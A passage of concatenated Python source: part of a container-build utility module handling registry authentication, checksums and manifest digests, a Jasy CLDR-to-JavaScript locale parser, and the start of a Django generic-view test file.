raise ValueError("invalid absolute path to plugin, it should be "
"plugin_type.plugin_name.argument_name")
logger.debug("getting plugin conf for '%s' with type '%s'",
plugin_name, plugin_type)
plugins_of_a_type = mapping.get(plugin_type, None)
if plugins_of_a_type is None:
logger.warning("there are no plugins with type '%s'",
plugin_type)
return
plugin_conf = [x for x in plugins_of_a_type if x['name'] == plugin_name]
plugins_num = len(plugin_conf)
if plugins_num == 1:
if arg_name not in plugin_conf[0]['args']:
logger.warning("no configuration value '%s' for plugin '%s', skipping",
arg_name, plugin_name)
return
logger.info("changing value '%s' of plugin '%s': '%s' -> '%s'",
arg_name, plugin_name, plugin_conf[0]['args'][arg_name], value)
plugin_conf[0]['args'][arg_name] = value
elif plugins_num <= 0:
logger.warning("there is no configuration for plugin '%s', skipping substitution",
plugin_name)
else:
logger.error("there is no configuration for plugin '%s'",
plugin_name)
raise RuntimeError("plugin '%s' was specified multiple (%d) times, can't pick one",
plugin_name, plugins_num)
def get_checksums(path, algorithms):
"""
Compute a checksum(s) of given file using specified algorithms.
:param path: path to file
:param algorithms: list of cryptographic hash functions, currently supported: md5, sha256
:return: dictionary
"""
if not algorithms:
return {}
compute_md5 = 'md5' in algorithms
compute_sha256 = 'sha256' in algorithms
if compute_md5:
md5 = hashlib.md5()
if compute_sha256:
sha256 = hashlib.sha256()
blocksize = 65536
with open(path, mode='rb') as f:
buf = f.read(blocksize)
while len(buf) > 0:
if compute_md5:
md5.update(buf)
if compute_sha256:
sha256.update(buf)
buf = f.read(blocksize)
checksums = {}
if compute_md5:
checksums['md5sum'] = md5.hexdigest()
logger.debug('md5sum: %s', checksums['md5sum'])
if compute_sha256:
checksums['sha256sum'] = sha256.hexdigest()
logger.debug('sha256sum: %s', checksums['sha256sum'])
return checksums
def get_docker_architecture(tasker):
docker_version = tasker.get_version()
host_arch = docker_version['Arch']
if host_arch == 'amd64':
host_arch = 'x86_64'
return (host_arch, docker_version['Version'])
def get_exported_image_metadata(path, image_type):
logger.info('getting metadata for exported image %s (%s)', path, image_type)
metadata = {'path': path, 'type': image_type}
if image_type != IMAGE_TYPE_OCI:
metadata['size'] = os.path.getsize(path)
logger.debug('size: %d bytes', metadata['size'])
metadata.update(get_checksums(path, ['md5', 'sha256']))
return metadata
def get_image_upload_filename(metadata, image_id, platform):
saved_image = metadata.get('path')
image_type = metadata.get('type')
if image_type == IMAGE_TYPE_DOCKER_ARCHIVE:
base_name = 'docker-image'
elif image_type == IMAGE_TYPE_OCI_TAR:
base_name = 'oci-image'
else:
raise ValueError("Unhandled image type for upload: {}".format(image_type))
ext = saved_image.split('.', 1)[1]
name_fmt = '{base_name}-{id}.{platform}.{ext}'
return name_fmt.format(base_name=base_name, id=image_id,
platform=platform, ext=ext)
def get_version_of_tools():
"""
get versions of tools reactor is using (specified in constants.TOOLS_USED)
:returns list of dicts, [{"name": "docker-py", "version": "1.2.3"}, ...]
"""
response = []
for tool in TOOLS_USED:
pkg_name = tool["pkg_name"]
try:
tool_module = import_module(pkg_name)
except ImportError as ex:
logger.warning("can't import module %s: %r", pkg_name, ex)
else:
version = getattr(tool_module, "__version__", None)
if version is None:
logger.warning("tool %s doesn't have __version__", pkg_name)
else:
response.append({
"name": tool.get("display_name", pkg_name),
"version": version,
"path": tool_module.__file__,
})
return response
def print_version_of_tools():
"""
print versions of used tools to logger
"""
logger.info("Using these tools:")
for tool in get_version_of_tools():
logger.info("%s-%s at %s", tool["name"], tool["version"], tool["path"])
# each tuple is sorted from most preferred to least
_PREFERRED_LABELS = (
('name', 'Name'),
('version', 'Version'),
('release', 'Release'),
('architecture', 'Architecture'),
('vendor', 'Vendor'),
('authoritative-source', 'Authoritative_Registry'),
('com.redhat.component', 'BZComponent'),
('com.redhat.build-host', 'Build_Host'),
)
def get_all_label_keys(name):
"""
Return the preference chain for the naming of a particular label.
:param name: string, label name to search for
:return: tuple, label names, most preferred first
"""
for label_chain in _PREFERRED_LABELS:
if name in label_chain:
return label_chain
else:
# no variants known, return the name unchanged
return (name,)
def get_preferred_label_key(labels, name):
"""
We can have multiple variants of some labels (e.g. Version and version), sorted by preference.
This function returns the best label corresponding to "name" that is present in the "labels"
dictionary.
Returns unchanged name if we don't have it in the preference table. If name is in the table
but none of the variants are in the labels dict, returns the most-preferred label - the
assumption is that we're gonna raise an error later and the error message should contain
the preferred variant.
"""
label_chain = get_all_label_keys(name)
for lbl in label_chain:
if lbl in labels:
return lbl
# none of the variants is in 'labels', return the best
return label_chain[0]
def get_preferred_label(labels, name):
key = get_preferred_label_key(labels, name)
return labels.get(key)
def get_build_json():
try:
return json.loads(os.environ["BUILD"])
except KeyError:
logger.error("No $BUILD env variable. Probably not running in build container")
raise
def is_scratch_build():
build_json = get_build_json()
try:
return build_json['metadata']['labels'].get('scratch', False)
except KeyError:
logger.error('metadata.labels not found in build json')
raise
# copypasted and slightly modified from
# http://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size/1094933#1094933
def human_size(num, suffix='B'):
for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
if abs(num) < 1024.0:
return "%3.2f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.2f %s%s" % (num, 'Yi', suffix)
def registry_hostname(registry):
"""
Strip a reference to a registry to just the hostname:port
"""
if registry.startswith('http:') or registry.startswith('https:'):
return urlparse(registry).netloc
else:
return registry
class Dockercfg(object):
def __init__(self, secret_path):
"""
Create a new Dockercfg object from a .dockercfg file whose
containing directory is secret_path.
:param secret_path: str, dirname of .dockercfg location
"""
self.json_secret_path = os.path.join(secret_path, '.dockercfg')
try:
with open(self.json_secret_path) as fp:
self.json_secret = json.load(fp)
except Exception:
msg = "failed to read registry secret"
logger.error(msg, exc_info=True)
raise RuntimeError(msg)
def get_credentials(self, docker_registry):
# For maximal robustness we check the host:port of the passed in
# registry against the host:port of the items in the secret. This is
# somewhat similar to what the Docker CLI does.
#
docker_registry = registry_hostname(docker_registry)
try:
return self.json_secret[docker_registry]
except KeyError:
for reg, creds in self.json_secret.items():
if registry_hostname(reg) == docker_registry:
return creds
logger.warn('%s not found in .dockercfg', docker_registry)
return {}
class RegistrySession(object):
def __init__(self, registry, insecure=False, dockercfg_path=None):
self.registry = registry
self._resolved = None
self.insecure = insecure
self.auth = None
if dockercfg_path:
dockercfg = Dockercfg(dockercfg_path).get_credentials(registry)
username = dockercfg.get('username')
password = dockercfg.get('password')
if username and password:
self.auth = requests.auth.HTTPBasicAuth(username, password)
self._fallback = None
if re.match('http(s)?://', self.registry):
self._base = self.registry
else:
self._base = 'https://{}'.format(self.registry)
if insecure:
# In the insecure case, if the registry is just a hostname:port, we
# don't know whether to talk HTTPS or HTTP to it, so we try first
# with https then fallback
self._fallback = 'http://{}'.format(self.registry)
self.session = get_retrying_requests_session()
def _do(self, f, relative_url, *args, **kwargs):
kwargs['auth'] = self.auth
kwargs['verify'] = not self.insecure
if self._fallback:
try:
res = f(self._base + relative_url, *args, **kwargs)
self._fallback = None # don't fallback after one success
return res
except (SSLError, ConnectionError):
self._base = self._fallback
self._fallback = None
return f(self._base + relative_url, *args, **kwargs)
def get(self, relative_url, data=None, **kwargs):
return self._do(self.session.get, relative_url, **kwargs)
def head(self, relative_url, data=None, **kwargs):
return self._do(self.session.head, relative_url, **kwargs)
def post(self, relative_url, data=None, **kwargs):
return self._do(self.session.post, relative_url, data=data, **kwargs)
def put(self, relative_url, data=None, **kwargs):
return self._do(self.session.put, relative_url, data=data, **kwargs)
def delete(self, relative_url, **kwargs):
return self._do(self.session.delete, relative_url, **kwargs)
class ManifestDigest(dict):
"""Wrapper for digests for a docker manifest."""
content_type = {
'v1': MEDIA_TYPE_DOCKER_V2_SCHEMA1,
'v2': MEDIA_TYPE_DOCKER_V2_SCHEMA2,
'v2_list': MEDIA_TYPE_DOCKER_V2_MANIFEST_LIST,
'oci': MEDIA_TYPE_OCI_V1,
'oci_index': MEDIA_TYPE_OCI_V1_INDEX,
}
@property
def default(self):
"""Return the default manifest schema version.
Depending on the docker version, <= 1.9, used to push
the image to the registry, v2 schema may not be available.
In such case, the v1 schema should be used when interacting
with the registry. An OCI digest will only be present when
the manifest was pushed as an OCI digest.
"""
return self.v2_list or self.oci_index or self.oci or self.v2 or self.v1
def __getattr__(self, attr):
if attr not in self.content_type:
raise AttributeError("Unknown version: %s", attr)
else:
return self.get(attr, None)
def get_manifest_media_type(version):
try:
return ManifestDigest.content_type[version]
except KeyError:
raise RuntimeError("Unknown manifest schema type")
def get_manifest_media_version(digest):
found_version = None
for version in ManifestDigest.content_type:
if digest.default and getattr(digest, version) == digest.default:
found_version = version
break
if not found_version:
raise RuntimeError("Can't detect version for digest %s" % digest)
return found_version
def get_digests_map_from_annotations(digests_str):
digests = {}
digests_annotations = json.loads(digests_str)
for digest_annotation in digests_annotations:
digest_version = digest_annotation['version']
digest = digest_annotation['digest']
media_type = get_manifest_media_type(digest_version)
digests[media_type] = digest
return digests
def query_registry(registry_session, image, digest=None, version='v1', is_blob=False):
"""Return manifest digest for image.
:param registry_session: RegistrySession
:param image: ImageName, the remote image to inspect
:param digest: str, digest of the image manifest
:param version: str, which manifest schema version to fetch digest
:param is_blob: bool, read blob config if set to True
:return: requests.Response object
"""
context = '/'.join([x for x in [image.namespace, image.repo] if x])
reference = digest or image.tag or 'latest'
object_type = 'manifests'
if is_blob:
object_type = 'blobs'
headers = {'Accept': (get_manifest_media_type(version))}
url = '/v2/{}/{}/{}'.format(context, object_type, reference)
logger.debug("query_registry: querying {}, headers: {}".format(url, headers))
response = registry_session.get(url, headers=headers)
response.raise_for_status()
return response
def get_manifest_digests(image, registry, insecure=False, dockercfg_path=None,
versions=('v1', 'v2', 'v2_list', 'oci', 'oci_index'), require_digest=True):
"""Return manifest digest for image.
:param image: ImageName, the remote image to inspect
:param registry: str, URI for registry, if URI schema is not provided,
https:// will be used
:param insecure: bool, when True registry's cert is not verified
:param dockercfg_path: str, dirname of .dockercfg location
:param versions: tuple, which manifest schema versions to fetch digest
:param require_digest: bool, when True exception is thrown if no digest is
set in the headers.
:return: dict, versions mapped to their digest
"""
registry_session = RegistrySession(registry, insecure=insecure, dockercfg_path=dockercfg_path)
digests = {}
# If all of the media types return a 404 NOT_FOUND status, then we rethrow
# an exception, if all of the media types fail for some other reason - like
# bad headers - then we return a ManifestDigest object with no digests.
# This is interesting for the Pulp "retry until the manifest shows up" case.
all_not_found = True
saved_not_found = None
for version in versions:
media_type = get_manifest_media_type(version)
headers = {'Accept': media_type}
try:
response = query_registry(
registry_session, image, digest=None,
version=version)
all_not_found = False
except (HTTPError, RetryError, Timeout) as ex:
if ex.response.status_code == requests.codes.not_found:
saved_not_found = ex
else:
all_not_found = False
# If the registry has a v2 manifest that can't be converted into a v1
# manifest, the registry fails with status=400 (BAD_REQUEST), and an error code of
# MANIFEST_INVALID. Note that if the registry has v2 manifest and
# you ask for an OCI manifest, the registry will try to convert the
# v2 manifest into a v1 manifest as the default type, so the same
# thing occurs.
if version != 'v2' and ex.response.status_code == requests.codes.bad_request:
logger.warning('Unable to fetch digest for %s, got error %s',
media_type, ex.response.status_code)
continue
# Returned if the manifest could not be retrieved for the given
# media type
elif (ex.response.status_code == requests.codes.not_found or
ex.response.status_code == requests.codes.not_acceptable):
continue
else:
raise
received_media_type = None
try:
received_media_type = response.headers['Content-Type']
except KeyError:
# Guess content_type from contents
try:
encoding = guess_json_utf(response.content)
manifest = json.loads(response.content.decode(encoding))
received_media_type = manifest['mediaType']
except (ValueError, # not valid JSON
KeyError) as ex: # no mediaType key
logger.warning("Unable to fetch media type: neither Content-Type header "
"nor mediaType in output was found")
if not received_media_type:
continue
# Only compare prefix as response may use +prettyjws suffix
# which is the case for signed manifest
response_h_prefix = received_media_type.rsplit('+', 1)[0]
request_h_prefix = media_type.rsplit('+', 1)[0]
if response_h_prefix != request_h_prefix:
logger.debug('request headers: %s', headers)
logger.debug('response headers: %s', response.headers)
logger.warning('Received media type %s mismatches the expected %s',
received_media_type, media_type)
continue
# set it to truthy value so that koji_import would know pulp supports these digests
digests[version] = True
logger.debug('Received media type %s', received_media_type)
if not response.headers.get('Docker-Content-Digest'):
logger.warning('Unable to fetch digest for %s, no Docker-Content-Digest header',
media_type)
continue
digests[version] = response.headers['Docker-Content-Digest']
context = '/'.join([x for x in [image.namespace, image.repo] if x])
tag = image.tag or 'latest'
logger.debug('Image %s:%s has %s manifest digest: %s',
context, tag, version, digests[version])
if not digests:
if all_not_found and len(versions) > 0:
raise saved_not_found
if require_digest:
raise RuntimeError('No digests found for {}'.format(image))
return ManifestDigest(**digests)
def get_config_from_registry(image, registry, digest, insecure=False,
dockercfg_path=None, version='v2'):
"""Return image config by digest
:param image: ImageName, the remote image to inspect
:param registry: str, URI for registry, if URI schema is not provided,
https:// will be used
:param digest: str, digest of the image manifest
:param insecure: bool, when True registry's cert is not verified
:param dockercfg_path: str, dirname of .dockercfg location
:param version: str, which manifest schema versions to fetch digest
:return: dict, versions mapped to their digest
"""
registry_session = RegistrySession(registry, insecure=insecure, dockercfg_path=dockercfg_path)
response = query_registry(
registry_session, image, digest=digest, version=version)
response.raise_for_status()
manifest_config = response.json()
config_digest = manifest_config['config']['digest']
config_response = query_registry(
registry_session, image, digest=config_digest, version=version, is_blob=True)
config_response.raise_for_status()
blob_config = config_response.json()
context = '/'.join([x for x in [image.namespace, image.repo] if x])
tag = image.tag or 'latest'
logger.debug('Image %s:%s has config:\n%s', context, tag, blob_config)
return blob_config
def df_parser(df_path, workflow=None, cache_content=False, env_replace=True, parent_env=None):
"""
Wrapper for dockerfile_parse's DockerfileParser that takes into account
parent_env inheritance.
:param df_path: string, path to Dockerfile (normally in DockerBuildWorkflow instance)
:param workflow: DockerBuildWorkflow object instance, used to find parent image information
:param cache_content: bool, tells DockerfileParser to cache Dockerfile content
:param env_replace: bool, replace ENV declarations as part of DockerfileParser evaluation
:param parent_env: dict, parent ENV key:value pairs to be inherited
:return: DockerfileParser object instance
"""
p_env = {}
if parent_env:
# If parent_env passed in, just use that
p_env = parent_env
elif workflow:
# If parent_env is not provided, but workflow is then attempt to inspect
# the workflow for the parent_env
try:
parent_config = workflow.base_image_inspect[INSPECT_CONFIG]
except (AttributeError, TypeError, KeyError):
logger.debug("base image unable to be inspected")
else:
try:
tmp_env = parent_config["Env"]
logger.debug("Parent Config ENV: %s" % tmp_env)
if isinstance(tmp_env, dict):
p_env = tmp_env
elif isinstance(tmp_env, list):
try:
for key_val in tmp_env:
key, val = key_val.split("=", 1)
p_env[key] = val
except ValueError:
logger.debug("Unable to parse all of Parent Config ENV")
except KeyError:
logger.debug("Parent Environment not found, not applied to Dockerfile")
try:
dfparser = DockerfileParser(
df_path,
cache_content=cache_content,
env_replace=env_replace,
parent_env=p_env
)
except TypeError:
logger.debug("Old version of dockerfile-parse detected, unable to set inherited parent "
"ENVs")
dfparser = DockerfileParser(
df_path,
cache_content=cache_content,
env_replace=env_replace,
)
return dfparser
def are_plugins_in_order(plugins_conf, *plugins_names):
"""Check if plugins are configured in given order."""
all_plugins_names = [plugin['name'] for plugin in plugins_conf or []]
start_index = 0
for plugin_name in plugins_names:
try:
start_index = all_plugins_names.index(plugin_name, start_index)
except ValueError:
return False
return True
def read_yaml(yaml_file_path, schema):
with open(yaml_file_path) as f:
data = yaml.safe_load(f)
try:
resource = resource_stream('atomic_reactor', schema)
schema = codecs.getreader('utf-8')(resource)
except (IOError, TypeError):
logger.error('unable to extract JSON schema, cannot validate')
raise
try:
schema = json.load(schema)
except ValueError:
logger.error('unable to decode JSON schema, cannot validate')
raise
validator = jsonschema.Draft4Validator(schema=schema)
try:
jsonschema.Draft4Validator.check_schema(schema)
validator.validate(data)
except jsonschema.SchemaError:
logger.error('invalid schema, cannot validate')
raise
except jsonschema.ValidationError:
for error in validator.iter_errors(data):
path = ''
for element in error.absolute_path:
if isinstance(element, int):
path += '[{}]'.format(element)
else:
path += '.{}'.format(element)
if path.startswith('.'):
path = path[1:]
logger.error('validation error (%s): %s', path or 'at top level', error.message)
raise
return data
class LabelFormatter(string.Formatter):
"""
using this because str.format can't handle keys with dots and dashes
which are included in some of the labels, such as
'authoritative-source-url', 'com.redhat.component', etc
"""
def get_field(self, field_name, args, kwargs):
return (self.get_value(field_name, args, kwargs), field_name)
class SessionWithTimeout(requests.Session):
"""
requests Session with added timeout
"""
def __init__(self, *args, **kwargs):
super(SessionWithTimeout, self).__init__(*args, **kwargs)
def request(self, *args, **kwargs):
kwargs.setdefault('timeout', HTTP_REQUEST_TIMEOUT)
return super(SessionWithTimeout, self).request(*args, **kwargs)
def get_retrying_requests_session(client_statuses=HTTP_CLIENT_STATUS_RETRY,
times=HTTP_MAX_RETRIES, delay=HTTP_BACKOFF_FACTOR,
method_whitelist=None):
retry = Retry(
total=int(times),
backoff_factor=delay,
status_forcelist=client_statuses,
method_whitelist=method_whitelist
)
session = SessionWithTimeout()
session.mount('http://', HTTPAdapter(max_retries=retry))
session.mount('https://', HTTPAdapter(max_retries=retry))
return session
def get_primary_images(workflow):
primary_images = workflow.tag_conf.primary_images
if not primary_images:
primary_images = [
ImageName.parse(primary) for primary in
workflow.build_result.annotations['repositories']['primary']]
return primary_images
|
|
#
# Jasy - Web Tooling Framework
# Copyright 2010-2012 Zynga Inc.
#
import os, json, re, xml.etree.ElementTree
import jasy.core.Console as Console
from jasy import datadir, __version__
import jasy.core.File
__all__ = ["LocaleParser"]
# Here we load our CLDR data from
CLDR_DIR = os.path.join(datadir, "cldr")
# Regular expression used for parsing CLDR plural rules
REGEXP_REL = re.compile(r"(\band\b|\bor\b)")
REGEXP_IS = re.compile(r"^(.*?) is (not )?([0-9]+)")
REGEXP_IN = re.compile(r"^(.*?) (not )?(within|in) ([0-9]+)\.\.([0-9]+)")
# Class template as used to generate JS files
CLASS_TEMPLATE = "// Automatically generated by Jasy %s\ncore.Module(\"%s\", %s);"
def camelCaseToUpper(input):
if input.upper() == input:
return input
result = []
for char in input:
conv = char.upper()
if char == conv and len(result) > 0:
result.append("_")
result.append(conv)
return "".join(result)
def pluralToJavaScript(expr):
"""
Translates the CLDR plural rules from
http://cldr.unicode.org/index/cldr-spec/plural-rules
into JavaScript expressions
"""
res = ""
for relation in REGEXP_REL.split(expr.lower()):
if relation == "and":
res += "&&"
elif relation == "or":
res += "||"
else:
match = REGEXP_IS.match(relation)
if match:
expr = match.group(1).strip()
if " " in expr:
expr = "(%s)" % re.compile(r"\s+mod\s+").sub("%", expr)
res += expr
if match.group(2) != None:
res += "!="
else:
res += "=="
res += match.group(3)
continue
match = REGEXP_IN.match(relation)
if match:
expr = match.group(1).strip()
if " " in expr:
expr = "(%s)" % re.compile(r"\s+mod\s+").sub("%", expr)
if match.group(2) != None:
res += "!"
res += "("
if match.group(3) == "in":
# Fast integer check via: http://jsperf.com/simple-integer-check
res += "~~" + expr + "==" + expr + "&&"
res += expr + ">=" + match.group(4) + "&&" + expr + "<=" + match.group(5)
res += ")"
continue
raise Exception("Unsupported relation: %s" % relation)
return res
class LocaleParser():
"""Parses CLDR locales into JavaScript files"""
def __init__(self, locale):
Console.info("Parsing CLDR files for %s..." % locale)
Console.indent()
splits = locale.split("_")
# Store for internal usage
self.__locale = locale
self.__language = splits[0]
self.__territory = splits[1] if len(splits) > 1 else None
# This will hold all data extracted data
self.__data = {}
# Add info section
self.__data["info"] = {
"LOCALE" : self.__locale,
"LANGUAGE" : self.__language,
"TERRITORY" : self.__territory
}
# Add keys (fallback to C-default locale)
path = "%s.xml" % os.path.join(CLDR_DIR, "keys", self.__language)
try:
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
except IOError:
path = "%s.xml" % os.path.join(CLDR_DIR, "keys", "C")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
self.__data["key"] = {
"Short" : { key.get("type"): key.text for key in tree.findall("./keys/short/key") },
"Full" : { key.get("type"): key.text for key in tree.findall("./keys/full/key") }
}
# Add main CLDR data: Fallback chain for locales
main = os.path.join(CLDR_DIR, "main")
files = []
while True:
files.append("%s.xml" % os.path.join(main, locale))
if "_" in locale:
locale = locale[:locale.rindex("_")]
else:
break
# Extend data with root data
files.append(os.path.join(main, "root.xml"))
# Finally import all these files in order
for path in reversed(files):
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
self.__addDisplayNames(tree)
self.__addDelimiters(tree)
self.__addCalendars(tree)
self.__addNumbers(tree)
# Add supplemental CLDR data
self.__addSupplementals(self.__territory)
Console.outdent()
def export(self, path):
Console.info("Writing result...")
Console.info("Target directory: %s", path)
Console.indent()
jasy.core.File.write(os.path.join(path, "jasyproject.yaml"), 'name: locale\npackage: ""\n')
count = self.__exportRecurser(self.__data, "locale", path)
Console.info("Created %s classes", count)
Console.outdent()
def __exportRecurser(self, data, prefix, project):
counter = 0
for key in data:
# Ignore invalid values
if key is None:
continue
value = data[key]
firstIsDict = False
for childKey in value:
if type(value[childKey]) == dict:
firstIsDict = True
break
if firstIsDict:
name = "%s.%s" % (prefix, key)
counter += self.__exportRecurser(value, name, project)
else:
name = "%s.%s%s" % (prefix, key[0].upper(), key[1:])
result = CLASS_TEMPLATE % (__version__, name, json.dumps(value, sort_keys=True, indent=2, ensure_ascii=False))
filename = "%s.js" % name.replace(".", os.path.sep)
jasy.core.File.write(os.path.join(project, "src", filename), result)
counter += 1
return counter
def __getStore(self, parent, name):
""" Manages data fields """
if not name in parent:
store = {}
parent[name] = store
else:
store = parent[name]
return store
def __addSupplementals(self, territory):
""" Converts data from supplemental folder """
supplemental = os.path.join(CLDR_DIR, "supplemental")
# Plurals
path = os.path.join(supplemental, "plurals.xml")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
self.__data["Plural"] = {}
for item in tree.findall("plurals/pluralRules"):
attr = item.get("locales")
if attr != None:
if self.__language in attr.split(" "):
for rule in item.findall("pluralRule"):
jsPlural = pluralToJavaScript(rule.text)
self.__data["Plural"][rule.get("count").upper()] = jsPlural
# Telephone Codes
path = os.path.join(supplemental, "telephoneCodeData.xml")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
for item in tree.findall("telephoneCodeData/codesByTerritory"):
territoryId = item.get("territory")
if territoryId == territory:
for rule in item.findall("telephoneCountryCode"):
self.__data["PhoneCode"] = {"CODE":int(rule.get("code"))}
# Respect first only
break
# Postal Codes
path = os.path.join(supplemental, "postalCodeData.xml")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
for item in tree.findall("postalCodeData/postCodeRegex"):
territoryId = item.get("territoryId")
if territory == territoryId:
self.__data["PostalCode"] = {"CODE":item.text}
break
# Supplemental Data
path = os.path.join(supplemental, "supplementalData.xml")
Console.info("Processing %s..." % os.path.relpath(path, CLDR_DIR))
tree = xml.etree.ElementTree.parse(path)
# :: Calendar Preference
ordering = None
for item in tree.findall("calendarPreferenceData/calendarPreference"):
if item.get("territories") == "001" and ordering == None:
ordering = item.get("ordering")
elif territory in item.get("territories").split(" "):
ordering = item.get("ordering")
break
self.__data["CalendarPref"] = { "ORDERING" : ordering.split(" ") }
# :: Week Data
self.__data["Week"] = {}
weekData = tree.find("weekData")
for key in ["firstDay", "weekendStart", "weekendEnd"]:
day = None
for item in weekData.findall(key):
if item.get("territories") == "001" and day == None:
day = item.get("day")
elif territory in item.get("territories").split(" "):
day = item.get("day")
break
self.__data["Week"][camelCaseToUpper(key)] = day
# :: Measurement System
self.__data["Measurement"] = {}
measurementData = tree.find("measurementData")
for key in ["measurementSystem", "paperSize"]:
mtype = None
for item in measurementData.findall(key):
if item.get("territories") == "001" and mtype == None:
mtype = item.get("type")
elif territory in item.get("territories").split(" "):
mtype = item.get("type")
break
self.__data["Measurement"][camelCaseToUpper(key)] = mtype
def __addDisplayNames(self, tree):
""" Adds CLDR display names section """
display = self.__getStore(self.__data, "display")
for key in ["languages", "scripts", "territories", "variants", "keys", "types", "measurementSystemNames"]:
# make it a little bit shorter, there is not really any conflict potential
if key == "measurementSystemNames":
store = self.__getStore(display, "Measure")
elif key == "territories":
store = self.__getStore(display, "Territory")
else:
# remove last character "s" to force singular
store = self.__getStore(display, key[:-1])
for element in tree.findall("./localeDisplayNames/%s/*" % key):
if not element.get("draft"):
field = element.get("type")
if not field in store:
store[camelCaseToUpper(field)] = element.text
def __addDelimiters(self, tree):
""" Adds CLDR delimiters """
delimiters = self.__getStore(self.__data, "delimiter")
for element in tree.findall("./delimiters/*"):
if not element.get("draft"):
field = element.tag
if not field in delimiters:
delimiters[camelCaseToUpper(field)] = element.text
def __addCalendars(self, tree, key="dates/calendars"):
""" Loops through all CLDR calendars and adds them """
calendars = self.__getStore(self.__data, "calendar")
for element in tree.findall("./%s/*" % key):
if not element.get("draft"):
self.__addCalendar(calendars, element)
def __addCalendar(self, store, element):
""" Adds data from a CLDR calendar section """
calendar = self.__getStore(store, element.get("type"))
# Months Widths
if element.find("months/monthContext/monthWidth") is not None:
months = self.__getStore(calendar, "month")
for child in element.findall("months/monthContext/monthWidth"):
if not child.get("draft"):
format = child.get("type")
if not format in months:
months[format] = {}
for month in child.findall("month"):
if not month.get("draft"):
name = month.get("type").upper()
if not name in months[format]:
months[format][name] = month.text
# Day Widths
if element.find("days/dayContext/dayWidth") is not None:
days = self.__getStore(calendar, "day")
for child in element.findall("days/dayContext/dayWidth"):
if not child.get("draft"):
format = child.get("type")
if not format in days:
days[format] = {}
for day in child.findall("day"):
if not day.get("draft"):
name = day.get("type").upper()
if not name in days[format]:
days[format][name] = day.text
# Quarter Widths
if element.find("quarters/quarterContext/quarterWidth") is not None:
quarters = self.__getStore(calendar, "quarter")
for child in element.findall("quarters/quarterContext/quarterWidth"):
if not child.get("draft"):
format = child.get("type")
if not format in quarters:
quarters[format] = {}
for quarter in child.findall("quarter"):
if not quarter.get("draft"):
name = quarter.get("type").upper()
if not name in quarters[format]:
quarters[format][name] = quarter.text
# Date Formats
if element.find("dateFormats/dateFormatLength") is not None:
dateFormats = self.__getStore(calendar, "date")
for child in element.findall("dateFormats/dateFormatLength"):
if not child.get("draft"):
format = child.get("type").upper()
text = child.find("dateFormat/pattern").text
if not format in dateFormats:
dateFormats[format] = text
# Time Formats
if element.find("timeFormats/timeFormatLength") is not None:
timeFormats = self.__getStore(calendar, "time")
for child in element.findall("timeFormats/timeFormatLength"):
if not child.get("draft"):
format = child.get("type").upper()
text = child.find("timeFormat/pattern").text
if not format in timeFormats:
timeFormats[format] = text
# DateTime Formats
if element.find("dateTimeFormats/availableFormats") is not None:
datetime = self.__getStore(calendar, "datetime")
for child in element.findall("dateTimeFormats/availableFormats/dateFormatItem"):
if not child.get("draft"):
# no uppercase here, because of intentianal camelcase
format = child.get("id")
text = child.text
if not format in datetime:
datetime[format] = text
# Fields
if element.find("fields/field") is not None:
fields = self.__getStore(calendar, "field")
for child in element.findall("fields/field"):
if not child.get("draft"):
format = child.get("type").upper()
for nameChild in child.findall("displayName"):
if not nameChild.get("draft"):
text = nameChild.text
if not format in fields:
fields[format] = text
break
# Relative
if element.find("fields/field") is not None:
relatives = self.__getStore(calendar, "relative")
for child in element.findall("fields/field"):
if not child.get("draft"):
format = child.get("type")
if child.findall("relative"):
relativeField = self.__getStore(relatives, format)
for relChild in child.findall("relative"):
if not relChild.get("draft"):
pos = relChild.get("type")
text = relChild.text
if not pos in relativeField:
relativeField[pos] = text
def __addNumbers(self, tree):
store = self.__getStore(self.__data, "number")
# Symbols
symbols = self.__getStore(store, "symbol")
for element in tree.findall("numbers/symbols/*"):
if not element.get("draft"):
field = camelCaseToUpper(element.tag)
if not field in store:
symbols[field] = element.text
# Formats
if not "format" in store:
store["format"] = {}
for format in ["decimal", "scientific", "percent", "currency"]:
if not format in store["format"]:
for element in tree.findall("numbers//%sFormat/pattern" % format):
store["format"][camelCaseToUpper(format)] = element.text
# Currencies
currencies = self.__getStore(store, "currencyName")
currenciesSymbols = self.__getStore(store, "currencySymbol")
for child in tree.findall("numbers/currencies/currency"):
if not child.get("draft"):
short = child.get("type")
for nameChild in child.findall("displayName"):
if not nameChild.get("draft"):
text = nameChild.text
if not format in currencies:
currencies[short] = text
break
for symbolChild in child.findall("symbol"):
currenciesSymbols[short] = symbolChild.text
|
|
from __future__ import unicode_literals
import datetime
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, override_settings, skipUnlessDBFeature
from django.test.utils import requires_tz_support
from django.utils import timezone
from .models import Book, BookSigning
def _make_books(n, base_date):
for i in range(n):
Book.objects.create(
name='Book %d' % i,
slug='book-%d' % i,
pages=100 + i,
pubdate=base_date - datetime.timedelta(days=i))
class ArchiveIndexViewTests(TestCase):
fixtures = ['generic-views-test-data.json']
urls = 'generic_views.urls'
def test_archive_view(self):
res = self.client.get('/dates/books/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['latest']), list(Book.objects.all()))
self.assertTemplateUsed(res, 'tests:templates/book_archive.html')
def test_archive_view_context_object_name(self):
res = self.client.get('/dates/books/context_object_name/')
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['date_list']), list(Book.objects.dates('pubdate', 'year', 'DESC')))
self.assertEqual(list(res.context['thingies']), list(Book.objects.all()))
self.assertFalse('latest' in res.context)
self.assertTemplateUsed(res, 'tests:templates/book_archive.html')
def test_empty_archive_view(self):
Book.objects.all().delete()
res = self.client.get('/dates/books/')
